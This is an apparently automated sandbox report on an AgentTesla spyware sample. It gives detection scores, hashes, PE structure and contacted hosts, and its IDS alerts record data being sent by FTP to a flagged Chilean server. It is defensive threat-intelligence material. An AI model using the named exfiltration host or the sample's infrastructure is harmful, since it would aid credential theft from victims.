          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Q4YODvoYjL.exe31%ReversingLabsWin32.Trojan.Generic
          Q4YODvoYjL.exe38%VirustotalBrowse
          Q4YODvoYjL.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.Q4YODvoYjL.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

          Domains

          SourceDetectionScannerLabelLink
          ftp.valvulasthermovalve.cl13%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://ftp.valvulasthermovalve.cl100%URL Reputationphishing
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          api4.ipify.org
          		173.231.16.76
          		truefalse
            		high
            ftp.valvulasthermovalve.cl
            		190.107.177.239
            		truetrueunknown
            api.ipify.org
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://ftp.valvulasthermovalve.clQ4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: phishing
                      		unknown
                      http://www.fontbureau.com/designers/?Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.tiro.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.goodfont.co.krQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comlQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cTheQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://api.ipify.orgQ4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://fontfabrik.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fonts.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQ4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sakkal.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        190.107.177.239
                                        		ftp.valvulasthermovalve.clChile
                                        		265831SOCCOMERCIALWIRENETCHILELTDACLtrue
                                        173.231.16.76
                                        		api4.ipify.orgUnited States
                                        		18450WEBNXUSfalse

                                        General Information

                                        Joe Sandbox Version:37.0.0 Beryl
                                        Analysis ID:830848
                                        Start date and time:2023-03-20 18:31:07 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 11m 41s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:5
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:Q4YODvoYjL.exe
                                        Original Sample Name:e30c67b19383f259d7414b763049eb2f.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 27
                                        • Number of non-executed functions: 5
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        18:32:16API Interceptor1x Sleep call for process: Q4YODvoYjL.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        190.107.177.239damianozx.exeGet hashmaliciousAgentTeslaBrowse
                                          VLLxQ18QRB.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                            xYhUjIjJji.exeGet hashmaliciousAgentTeslaBrowse
                                              ycv181LVaT.exeGet hashmaliciousAgentTeslaBrowse
                                                JXOOPXvS5C.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                  2NXg1mCUU4.exeGet hashmaliciousAgentTeslaBrowse
                                                    Gg8YI1mci5.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                      VednQfch4s.exeGet hashmaliciousAgentTeslaBrowse
                                                        P5meQD3S50.exeGet hashmaliciousAgentTeslaBrowse
                                                          K438ORfulY.exeGet hashmaliciousAgentTeslaBrowse
                                                            1qisZsuMDP.exeGet hashmaliciousAgentTeslaBrowse
                                                              qz0I6ZBxju.exeGet hashmaliciousAgentTeslaBrowse
                                                                Q2nmFVIZgw.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                  rYaS0282Kh.exeGet hashmaliciousAgentTeslaBrowse
                                                                    I5l9GuKc0v.exeGet hashmaliciousAgentTeslaBrowse
                                                                      damianozx.exeGet hashmaliciousAgentTeslaBrowse
                                                                        JPG1K8w5ZL.exeGet hashmaliciousAgentTeslaBrowse
                                                                          Fnm9pLZclY.exeGet hashmaliciousAgentTeslaBrowse
                                                                            xc63B4fN7n.exeGet hashmaliciousAgentTeslaBrowse
                                                                              LijTfSTMZM.exeGet hashmaliciousAgentTeslaBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                api4.ipify.orgSmh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 104.237.62.211
                                                                                eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                • 104.237.62.211

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                SOCCOMERCIALWIRENETCHILELTDACLdamianozx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                VLLxQ18QRB.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 190.107.177.239
                                                                                xYhUjIjJji.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                ycv181LVaT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                JXOOPXvS5C.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 190.107.177.239
                                                                                2NXg1mCUU4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                Gg8YI1mci5.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 190.107.177.239
                                                                                VednQfch4s.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                P5meQD3S50.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                K438ORfulY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                1qisZsuMDP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                qz0I6ZBxju.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                Q2nmFVIZgw.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 190.107.177.239
                                                                                rYaS0282Kh.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                I5l9GuKc0v.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                damianozx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                JPG1K8w5ZL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                Fnm9pLZclY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                xc63B4fN7n.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239
                                                                                LijTfSTMZM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 190.107.177.239

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0ewidnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                Payment Invoice file.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                • 173.231.16.76
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • 173.231.16.76
                                                                                Budget plan 2023.zipGet hashmaliciousUnknownBrowse
                                                                                • 173.231.16.76
                                                                                setup.exeGet hashmaliciousXmrigBrowse
                                                                                • 173.231.16.76
                                                                                Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                • 173.231.16.76
                                                                                Payment Invoice 0012657.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 173.231.16.76
                                                                                FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                • 173.231.16.76
                                                                                PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Q4YODvoYjL.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1216
                                                                                Entropy (8bit):5.355304211458859
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.8590585184951305
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:Q4YODvoYjL.exe
                                                                                File size:743936
                                                                                MD5:e30c67b19383f259d7414b763049eb2f
                                                                                SHA1:8a1465b73066cf8642d39c9ef2333d8361e9d177
                                                                                SHA256:182086eeecf6f1b4dc82a040a476d947759556513ad63c129604c565cd06cdc3
                                                                                SHA512:259d0ab342f9bbc514d57064203ef45f07f2236b50fae92c29842371350627ada09a745a48fefc0ec8f85f524dad7f0252ef807714d09991cffb633cb61578f7
                                                                                SSDEEP:12288:C4hmYMUnFW/NxBig0kCw7B89OFsFVLWJDGeVjhiPJ8MoN5oxbjS2RyXyabHWHRpe:C4hUDQNkCQoOFYVADxkBzO2xbjJyiSWE
                                                                                TLSH:8FF402742BEA9739F43297BE85A43545976E63B32717C84C04F211CE4BA3B435ED0A2B
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..d..............0..D...........b... ........@.. ....................................@................................

                                                                                File Icon

                                                                                Icon Hash:209480e66eb84902

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x4b62fe
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6417B720 [Mon Mar 20 01:30:08 2023 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb62ab0x4f.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x1110.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb4e980x54.text
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000xb43040xb4400False0.9267144699202496data7.867913508227014IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xb80000x11100x1200False0.73046875data6.632660853110352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xba0000xc0x200False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_ICON0xb81000xa79PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                RT_GROUP_ICON0xb8b8c0x14data
                                                                                RT_VERSION0xb8bb00x360data
                                                                                RT_MANIFEST0xb8f200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                192.168.2.5190.107.177.23949700549262851779 03/20/23-18:32:35.384138TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4970054926192.168.2.5190.107.177.239
                                                                                192.168.2.5190.107.177.23949699212029927 03/20/23-18:32:35.159386TCP2029927ET TROJAN AgentTesla Exfil via FTP4969921192.168.2.5190.107.177.239

                                                                                Network Port Distribution

                                                                                TCP Packets

